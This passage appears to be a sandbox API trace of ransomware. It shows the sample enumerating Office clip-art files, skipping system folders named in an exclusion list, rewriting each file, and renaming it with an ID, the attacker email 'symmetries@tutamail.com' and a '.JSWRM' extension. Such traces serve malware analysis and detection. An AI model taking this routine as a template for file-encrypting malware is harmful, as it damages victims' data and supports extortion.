dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 [0075.328] CloseHandle (hObject=0x460) returned 1 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0075.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0075.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0075.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0075.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.329] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.330] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00078_.WMF", cAlternateFileName="")) returned 1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2=".") returned 1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="..") returned 1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="...") returned 1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="windows") returned -1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="recovery") returned -1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="perflogs") returned -1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="documents and settings") returned -1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="system volume information") returned -1 [0075.330] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="msocache") returned -1 [0075.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00078_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00078_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00078_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00078_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00078_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00078_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.331] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1444) returned 1 [0075.331] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a0) returned 0x23fc98 [0075.331] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x5a0, lpOverlapped=0x0) returned 1 [0075.333] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.333] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x5a0, lpOverlapped=0x0) returned 1 [0075.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.333] CloseHandle (hObject=0x460) returned 1 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0075.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0075.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0075.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0075.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.333] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0075.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.334] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f26, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00092_.WMF", cAlternateFileName="")) returned 1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2=".") returned 1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="..") returned 1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="...") returned 1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="windows") returned -1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="recovery") returned -1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="perflogs") returned -1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="documents and settings") returned -1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="system volume information") returned -1 [0075.334] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="msocache") returned -1 [0075.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00092_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00092_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00092_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00092_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00092_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00092_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.335] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7974) returned 1 [0075.335] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f20) returned 0x24c1d0 [0075.335] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1f20, lpOverlapped=0x0) returned 1 [0075.462] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.462] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1f20, lpOverlapped=0x0) returned 1 [0075.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.462] CloseHandle (hObject=0x460) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0075.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0075.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0075.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0075.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00100_.WMF", cAlternateFileName="")) returned 1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2=".") returned 1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="..") returned 1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="...") returned 1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="windows") returned -1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="recovery") returned -1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="perflogs") returned -1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="documents and settings") returned -1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="system volume information") returned -1 [0075.464] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="msocache") returned -1 [0075.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00100_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00100_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00100_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00100_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00100_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00100_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0075.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.465] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2378) returned 1 [0075.465] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x940) returned 0x23fc98 [0075.465] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x940, lpOverlapped=0x0) returned 1 [0075.466] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.466] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x940, lpOverlapped=0x0) returned 1 [0075.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.467] CloseHandle (hObject=0x460) returned 1 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0075.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0075.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0075.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0075.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 